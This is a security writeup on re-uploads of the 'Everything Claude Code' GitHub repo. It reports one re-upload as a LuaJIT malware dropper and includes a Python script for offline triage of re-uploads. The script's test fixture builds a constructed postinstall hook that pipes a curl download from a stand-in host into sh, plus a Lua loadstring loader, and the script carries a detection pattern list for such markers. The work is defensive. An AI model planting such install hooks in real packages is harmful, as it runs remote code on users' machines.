affaan-m/ECC — better known as Everything Claude Code — has over 213,000 GitHub stars, making it one of the most-starred repositories on the platform. When something goes that viral, two security events follow automatically: people install it without reading it, and re-uploads start appearing. We looked at both.
The headline: most of the re-uploads are harmless stale copies — but one is a malware dropper, a fake "download toolkit" that ships an obfuscated LuaJIT payload and tells non-technical users to double-click it. The original repo isn't malware, but it does install a large, globally-active, auto-executing surface that most people clicking install have never reckoned with.
This is an evidence-based writeup. Every claim about a repo we name is backed by a file you can check yourself; for the re-uploads we deliberately don't name, we describe our method so you can reproduce the check. Nothing below is a how-to for abuse.
How we looked
We cloned the original plus 19 public re-uploads. For each re-upload we diffed the full file tree against a fresh copy of upstream (git diff --no-index), checked the clone's HEAD commit and tree hash against upstream history via the GitHub API, and then hand-read the parts that actually run on your machine: hooks/, the installer, package.json, .mcp.json, and any bundled archives. Archives were never extracted to disk: we listed their contents (unzip -l) and streamed individual files read-only (unzip -p); nothing from any repo was executed. For the original's prompt-injection surface we counted the auto-loadable instruction files and grepped the tree for injection/exfiltration and pipe-to-shell markers. One honest caveat: for the npm packages we read registry metadata, not the unpacked tarballs.
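The triage loop described above, as an added example that is not part of the original writeup and not the authors' own tooling. It runs offline on a constructed pair of trees (an "upstream" and a "re-upload") and a constructed in-memory zip standing in for a bundled download toolkit. To avoid external binaries it substitutes per-file SHA-256 comparison for git diff --no-index and Python's zipfile module for unzip -l / unzip -p; the marker patterns are an assumed list, not the writeup's exact grep, and every file name and file body in the fixture is made up. Nothing is extracted to disk and nothing from the archive is executed.

```python
"""Offline re-upload triage: tree diff, read-only archive listing, marker grep."""
import hashlib
import io
import json
import re
import tempfile
import zipfile
from pathlib import Path

# Assumed marker list (not the writeup's exact grep): things a hand-read should stop on.
SUSPECT_PATTERNS = [
    r"(curl|wget)\b[^|\n]*\|\s*(ba|z)?sh\b",  # pipe-to-shell
    r"\beval\s*\(",                           # dynamic execution
    r"base64\s*(-d|--decode)\b",              # decode-then-run staging
    r"\bloadstring\b",                        # LuaJIT/Lua dynamic code loading
]


def tree_digest(root: Path) -> dict:
    """Map relative path -> sha256 of every regular file under root (.git skipped)."""
    out = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and ".git" not in p.parts:
            out[p.relative_to(root).as_posix()] = hashlib.sha256(p.read_bytes()).hexdigest()
    return out


def diff_trees(upstream: dict, clone: dict) -> dict:
    """Stand-in for `git diff --no-index --stat`: added / removed / modified paths."""
    return {
        "added": sorted(set(clone) - set(upstream)),
        "removed": sorted(set(upstream) - set(clone)),
        "modified": sorted(p for p in set(clone) & set(upstream) if clone[p] != upstream[p]),
    }


def list_archive(data: bytes) -> list:
    """Read-only stand-in for `unzip -l`: (name, uncompressed size) per member."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [(i.filename, i.file_size) for i in zf.infolist()]


def stream_member(data: bytes, name: str, limit: int = 1 << 20) -> bytes:
    """Read-only stand-in for `unzip -p`: one member into memory, capped at `limit` bytes."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as fh:
        return fh.read(limit)


def scan_text(text: str) -> list:
    """Return the suspect patterns that match; the caller decides what to hand-read."""
    return [pat for pat in SUSPECT_PATTERNS if re.search(pat, text, re.IGNORECASE)]


def triage(upstream_root: Path, clone_root: Path) -> dict:
    """Diff the clone against upstream, then grep only what changed (archives included)."""
    diff = diff_trees(tree_digest(upstream_root), tree_digest(clone_root))
    report = {"diff": diff, "hits": {}, "archives": {}}
    for rel in diff["added"] + diff["modified"]:
        path = clone_root / rel
        if rel.lower().endswith(".zip"):
            data = path.read_bytes()
            members = list_archive(data)
            report["archives"][rel] = members
            for name, _size in members:  # streamed, never written to disk
                hits = scan_text(stream_member(data, name).decode("utf-8", "replace"))
                if hits:
                    report["hits"][f"{rel}:{name}"] = hits
        else:
            hits = scan_text(path.read_text(errors="replace"))
            if hits:
                report["hits"][rel] = hits
    return report


def build_fixture(base: Path) -> tuple:
    """Constructed sample data: an upstream tree and a re-upload that changed two things."""
    up, cl = base / "upstream", base / "reupload"
    for root in (up, cl):
        (root / "hooks").mkdir(parents=True)
        (root / "hooks" / "pre-commit.sh").write_text("#!/bin/sh\nnpm run lint\n")
        (root / "README.md").write_text("# ECC\n")
    (up / "package.json").write_text('{"name":"ecc","version":"1.0.0"}\n')
    # Re-upload adds a postinstall hook that pipes a download to sh (constructed).
    (cl / "package.json").write_text(
        '{"name":"ecc","version":"1.0.0","scripts":{"postinstall":'
        '"curl -s https://example.invalid/x | sh"}}\n')
    # Re-upload also bundles a "toolkit" archive with a Lua loader (constructed).
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "Double-click loader.exe to install the toolkit.\n")
        zf.writestr("loader.lua", "local p='...'\nreturn loadstring(p)()\n")
    (cl / "DOWNLOAD_TOOLKIT.zip").write_bytes(buf.getvalue())
    return up, cl


def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        up, cl = build_fixture(Path(tmp))
        return triage(up, cl)


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Only paths that differ from upstream are scanned, which is the point of diffing first: on a stale copy the report is empty and the hand-read is short, while on a modified re-upload the report names the exact files and archive members to open. The commit/tree-hash check against upstream history needs network access to the GitHub API and is deliberately left out of this offline example.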